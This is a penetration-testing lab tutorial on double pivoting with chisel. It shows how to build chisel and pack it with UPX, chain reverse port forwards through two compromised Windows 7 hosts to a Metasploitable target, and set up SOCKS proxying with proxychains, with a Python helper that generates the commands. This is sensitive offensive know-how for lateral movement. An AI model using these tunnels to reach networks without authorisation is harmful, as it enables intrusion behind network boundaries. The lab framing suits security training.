Double pivoting with Chisel


hello folks

In this topic we will talk about a sensitive situation: what if you get a shell on a machine, but there is no SSH client or server on it, and you don't have Meterpreter to run autoroute and start pivoting? So today I will talk about chisel, the tool I like best for pivoting. You can read about it here:

https://github.com/jpillora/chisel

and let’s go

At first, when you run the git clone command, you download the chisel repository (chisel is written in the Go language), and it needs to be built for each specific OS. Here are the instructions:

https://gist.github.com/asukakenji/f15ba7e588ac42795f421b48b8aede63#a-list-of-valid-goarch-values

These are the files after cloning it from GitHub.

Then we start to build chisel.

To build it we have one command:

# GOOS=windows GOARCH=386 go build

GOOS="<OS>" GOARCH="<architecture of the OS>" go build

386 = 32-bit | amd64 = 64-bit

And you can choose your OS, such as Windows, Linux, etc.; all the details are in the link below:

https://gist.github.com/asukakenji/f15ba7e588ac42795f421b48b8aede63#a-list-of-valid-goarch-values

Here is an example for the Windows platform:

# upx --brute chisel

"This command is optional, if you need to reduce the size of the tool."

Here we finish the first part, how to build chisel.


After building it and reducing the size,

let's begin our lab. First we will try double port forwarding 🙂 and don't forget, here I do not care about the exploitation method or how you will transfer the tools to the targets, that is your responsibility; I will just show you some tricks for pivoting.

Our topology is the same as in this photo:

About the IPs of the machines:

Our machine, Kali Linux, assumed to be the attacker, has IP = 192.168.40.128

The next Win7, assumed to be the first pivot point, has 2 NICs: the first IP is 192.168.40.130, the second IP is 192.168.30.130

The next Win7, assumed to be the second pivot point, has 2 NICs: the first IP is 192.168.30.131, the second IP is 192.168.20.131

And at last, our target, metasploitable, has only one IP = 192.168.20.128


Let's start.

We will run chisel as a server on the first pivot PC:

# chisel server -p 8888 -reverse

The -reverse flag is what allows a client to ask this server for an R: (remote) forward; without it the server refuses the request.

Then we will connect to the chisel server from the second pivot PC and start a remote port forward:

# chisel client 192.168.30.130:8888 R:9001:192.168.20.128:80

Here, from pivot PC 2, I take port 80 of metasploitable, which I can reach in my network (192.168.20.128), and tunnel it to the server (pivot PC 1) on port 9001. Now the first pivot point can reach the HTTP service of metasploitable locally via port 9001.

Now we can do the same between the attacker machine and pivot PC 1: make a remote port tunnel and send port 9001 to another local port on Kali.

So first let's run chisel as a server on Kali (on port 8000, again with -reverse).

And now let's connect from pivot PC 1, the first pivot point:

# chisel client 192.168.40.128:8000 R:8001:127.0.0.1:9001

And now we are done: port 8001 on Kali reaches port 9001 on pivot PC 1, which in turn reaches port 80 on metasploitable.

And here we finish port forwarding 🙂
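As an added example (my own code, not from the post or the chisel project), here is a small planner that generates the commands for the chain above in start order and checks that the port each hop opens lands on the host whose client refers to it as 127.0.0.1:<port>; it also works for more than two hops. The host labels and the Hop structure are assumptions made for the example; the IPs and ports are the ones from the post.

```python
from dataclasses import dataclass
from typing import List, Tuple

@dataclass
class Hop:
    """One hop: client_host runs `chisel client`, connects to the chisel server on
    server_host (reached at server_ip:server_port) and asks it to open opened_port
    there via an R: forward. Host names are labels constructed for this example."""
    client_host: str
    server_host: str
    server_ip: str
    server_port: int
    opened_port: int

def chain_errors(hops: List[Hop]) -> List[str]:
    """The port each hop opens must land on the host running the next-nearer
    hop's client, otherwise that client's R:...:127.0.0.1:<port> points at nothing."""
    errors = []
    for nearer, farther in zip(hops, hops[1:]):
        if farther.server_host != nearer.client_host:
            errors.append(f"{farther.client_host} opens {farther.opened_port} on "
                          f"{farther.server_host}, but {nearer.client_host} expects it locally")
    return errors

def plan(hops: List[Hop], target_ip: str, target_port: int) -> List[Tuple[str, str]]:
    """Return (host, command) pairs in start order. hops[0] is nearest the attacker,
    hops[-1] is the hop whose client can reach the target directly. Each hop but the
    last tunnels to 127.0.0.1:<port the next hop opened on this host>; every server
    is listed before its client, innermost hop first, as in the post."""
    problems = chain_errors(hops)
    if problems:
        raise ValueError("; ".join(problems))
    cmds = []
    for i in range(len(hops) - 1, -1, -1):
        hop = hops[i]
        dest = (f"{target_ip}:{target_port}" if i == len(hops) - 1
                else f"127.0.0.1:{hops[i + 1].opened_port}")
        cmds.append((hop.server_host, f"chisel server -p {hop.server_port} --reverse"))
        cmds.append((hop.client_host, f"chisel client {hop.server_ip}:{hop.server_port} "
                                      f"R:{hop.opened_port}:{dest}"))
    return cmds

# The two-hop lab from the post: kali <- pivot1 <- pivot2 -> metasploitable:80
POST_HOPS = [
    Hop("pivot1", "kali", "192.168.40.128", 8000, 8001),
    Hop("pivot2", "pivot1", "192.168.30.130", 8888, 9001),
]

if __name__ == "__main__":
    for host, cmd in plan(POST_HOPS, "192.168.20.128", 80):
        print(f"[{host}] {cmd}")
```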


Now, what about dynamic port forwarding and using it with proxychains 😉

Let's start by running chisel as a server with the --socks5 option.

Connect to the server with the client and specify local port 9999 for proxychains.

Then run another chisel server to start a connection with the next PC (pivot PC 2).

Here we run chisel as a client and choose port 8888 as the local port for the proxy.

Now let's configure our proxychains config file.

Let's try to scan our metasploitable, and it works successfully.

Now we are finished.

Special thanks to EBRAHIM KHADI AND ESLAM MEDHAT

 
